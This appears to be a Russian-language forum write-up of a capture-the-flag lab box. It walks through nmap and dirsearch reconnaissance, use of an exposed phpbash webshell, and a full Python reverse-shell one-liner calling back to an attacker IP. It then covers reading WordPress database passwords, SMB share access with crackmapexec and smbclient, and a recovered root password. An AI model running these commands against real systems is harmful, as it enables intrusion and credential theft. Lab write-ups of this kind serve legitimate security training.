r0dd9
Green Team
- 14.08.2019
- 36
- 31
- Специализация
- Пентест
Прямая ссылка на задание
1. nmap samba
2. curl robot.txt
3. reverse shell
4. Admin Backup
5. root credentials
Цель
Сервер 192.168.2.208
Разведка цели
Открытые порты.
Banner grabbing.
Fuzzing директорий.
В robots.txt webshell phpbash.php
Выбираем вектор атаки
Откроем в браузере
webshell phpbash.php - это интерактивная веб-консоль, которая предоставляет полноценную командную оболочку прямо в браузере.
есть python сделаем reverse shell
Этап 1: reverse shell
Этап 2: Admin Backups
Проверим подключение к SMB-серверу с использованием найденных учётных данных для перечисления доступных шар.
Скачаем backup.
Этап 3: root credentials
Это архив, в нем config wordpress.
Распакуем и найдем еще один пароль.
Этап 4: LPE - flag
Пароль подошел для root.
CTF решен!
Инструменты: nmap, curl, crackmapexec, smbclient, python, nc
1. nmap samba
2. curl robot.txt
3. reverse shell
4. Admin Backup
5. root credentials
Сервер 192.168.2.208
Открытые порты.
Bash:
┌──(kali㉿kali)-[~]
└─$ nmap -sS 192.168.2.208
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-30 13:11 +0000
Nmap scan report for 192.168.2.208
Host is up (0.14s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 3.67 seconds
Banner grabbing.
Bash:
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC -O -T3 -p 22,80,139,445 192.168.2.208
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-30 13:14 +0000
Nmap scan report for 192.168.2.208
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 26:71:14:05:c3:3e:14:c5:e9:c1:b0:fb:4b:8a:f7:ac (ECDSA)
|_ 256 24:44:8e:48:43:98:02:6b:f1:18:fe:ba:83:6b:88:12 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Unix))
|_http-server-header: Apache/2.4.62 (Unix)
|_http-title: \xD0\xA1\xD0\xB0\xD0\xBC\xD0\xB1\xD0\xBE
| http-robots.txt: 1 disallowed entry
|_/phpbash.php
|_http-generator: WordPress 6.7.1
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Host script results:
| smb2-time:
| date: 2026-06-30T13:14:21
|_ start_date: N/A
|_nbstat: NetBIOS name: SAMBO, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.17 seconds
Fuzzing директорий.
Bash:
┌──(kali㉿kali)-[~]
└─$ dirsearch -u 192.168.2.208
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/reports/_192.168.2.208/_26-06-30_13-16-48.txt
Target: http://192.168.2.208/
[13:16:48] Starting:
[13:17:02] 403 - 276B - /.ht_wsr.txt
[13:17:02] 403 - 276B - /.htaccess.bak1
[13:17:02] 403 - 276B - /.htaccess.orig
[13:17:02] 403 - 276B - /.htaccess.sample
[13:17:02] 403 - 276B - /.htaccess_orig
[13:17:02] 403 - 276B - /.htaccessOLD2
[13:17:02] 403 - 276B - /.htaccessBAK
[13:17:02] 403 - 276B - /.htaccessOLD
[13:17:02] 403 - 276B - /.htaccess_sc
[13:17:02] 403 - 276B - /.htaccess.save
[13:17:02] 403 - 276B - /.htaccess_extra
[13:17:02] 403 - 276B - /.htm
[13:17:02] 403 - 276B - /.html
[13:17:02] 403 - 276B - /.htpasswd_test
[13:17:02] 403 - 276B - /.htpasswds
[13:17:02] 403 - 276B - /.httr-oauth
[13:17:28] 200 - 820B - /cgi-bin/printenv
[13:17:28] 200 - 1KB - /cgi-bin/test-cgi
[13:17:33] 301 - 311B - /data -> http://192.168.2.208/data/
[13:17:33] 403 - 276B - /data/adminer.php
[13:17:33] 403 - 276B - /data/
[13:17:33] 403 - 276B - /data/backups/
[13:17:33] 403 - 276B - /data/cache/
[13:17:33] 403 - 276B - /data/autosuggest
[13:17:33] 403 - 276B - /data/debug/
[13:17:33] 403 - 276B - /data/DoctrineORMModule/Proxy/
[13:17:33] 403 - 276B - /data/DoctrineORMModule/cache/
[13:17:33] 403 - 276B - /data/logs/
[13:17:33] 403 - 276B - /data/sessions/
[13:17:33] 403 - 276B - /data/tmp/
[13:17:33] 403 - 276B - /data/files/
[13:17:42] 301 - 0B - /index.php -> http://192.168.2.208/
[13:17:42] 404 - 53KB - /index.php/login/
[13:17:45] 200 - 19KB - /license.txt
[13:17:57] 200 - 7KB - /readme.html
[13:17:58] 200 - 37B - /robots.txt
[13:18:00] 403 - 276B - /server-status/
[13:18:00] 403 - 276B - /server-status
[13:18:12] 301 - 315B - /wp-admin -> http://192.168.2.208/wp-admin/
[13:18:12] 301 - 317B - /wp-content -> http://192.168.2.208/wp-content/
[13:18:12] 200 - 0B - /wp-content/
[13:18:12] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[13:18:12] 500 - 0B - /wp-content/plugins/hello.php
[13:18:12] 200 - 359B - /wp-content/uploads/
[13:18:12] 301 - 318B - /wp-includes -> http://192.168.2.208/wp-includes/
[13:18:13] 200 - 0B - /wp-includes/rss-functions.php
[13:18:13] 200 - 0B - /wp-cron.php
[13:18:13] 409 - 3KB - /wp-admin/setup-config.php
[13:18:13] 200 - 4KB - /wp-login.php
[13:18:13] 200 - 17KB - /wp-includes/
[13:18:13] 302 - 0B - /wp-signup.php -> http://192.168.2.238/wp-login.php?action=register
[13:18:14] 405 - 42B - /xmlrpc.php
[13:18:15] 200 - 0B - /wp-config.php
[13:18:15] 400 - 1B - /wp-admin/admin-ajax.php
[13:18:15] 302 - 0B - /wp-admin/ -> http://192.168.2.238/wp-login.php?redirect_to=http%3A%2F%2F192
[13:18:15] 200 - 1KB - /wp-admin/install.php
Task Completed
В robots.txt webshell phpbash.php
Bash:
┌──(kali㉿kali)-[~]
└─$ curl http://192.168.2.208/robots.txt
User-Agent: *
Disallow: /phpbash.php
Откроем в браузере
webshell phpbash.php - это интерактивная веб-консоль, которая предоставляет полноценную командную оболочку прямо в браузере.
Bash:
apache@sambo
:/var/www/localhost/htdocs# id
uid=103(apache) gid=104(apache) groups=82(www-data),104(apache),104(apache)
apache@sambo
:/var/www/localhost/htdocs# which python
/usr/bin/python
есть python сделаем reverse shell
Bash:
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.168.116.116",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.116.116] from (UNKNOWN) [192.168.2.208] 54678
/bin/sh: can't access tty; job control turned off
/var/www/localhost/htdocs $ cat wp-config.php
/** Database username */
define( 'DB_USER', 'admin' );
/** Database password */
define( 'DB_PASSWORD', 'R-e4|D0:50Tl' );
Проверим подключение к SMB-серверу с использованием найденных учётных данных для перечисления доступных шар.
Bash:
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.2.208 -u admin -p 'R-e4|D0:50Tl' --shares
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SSH protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing WINRM protocol database
[*] Initializing MSSQL protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 192.168.2.208 445 SAMBO [*] Windows 6.1 Build 0 (name:SAMBO) (domain:localdomain) (signing:False) (SMBv1:False)
SMB 192.168.2.208 445 SAMBO [+] localdomain\admin:R-e4|D0:50Tl
SMB 192.168.2.208 445 SAMBO [+] Enumerated shares
SMB 192.168.2.208 445 SAMBO Share Permissions Remark
SMB 192.168.2.208 445 SAMBO ----- ----------- ------
SMB 192.168.2.208 445 SAMBO storage READ Admin Backups
SMB 192.168.2.208 445 SAMBO IPC$ IPC Service (Samba 4.20.6)
Скачаем backup.
Bash:
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.2.208/storage -U admin%'R-e4|D0:50Tl'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 03:54:11 2025
.. D 0 Mon Jan 20 03:54:11 2025
wordpress.bak N 29877616 Mon Jan 20 03:54:11 2025
1208288 blocks of size 1024. 242148 blocks available
smb: \> get wordpress.bak
getting file \wordpress.bak of size 29877616 as wordpress.bak (2096.5 KiloBytes/sec) (average 2096.5 KiloBytes/sec)
Это архив, в нем config wordpress.
Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ file wordpress.bak
wordpress.bak: Zip archive data, at least v2.0 to extract, compression method=deflate
Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ unzip -l wordpress.bak
Archive: wordpress.bak
Распакуем и найдем еще один пароль.
Bash:
┌──(kali㉿kali)-[~/Documents/sambo]
└─$ cat wp-config.php
/** Database username */
define( 'DB_USER', 'admin' );
/** Database password */
define( 'DB_PASSWORD', '29:Lb4Yb+SAs' );
Пароль подошел для root.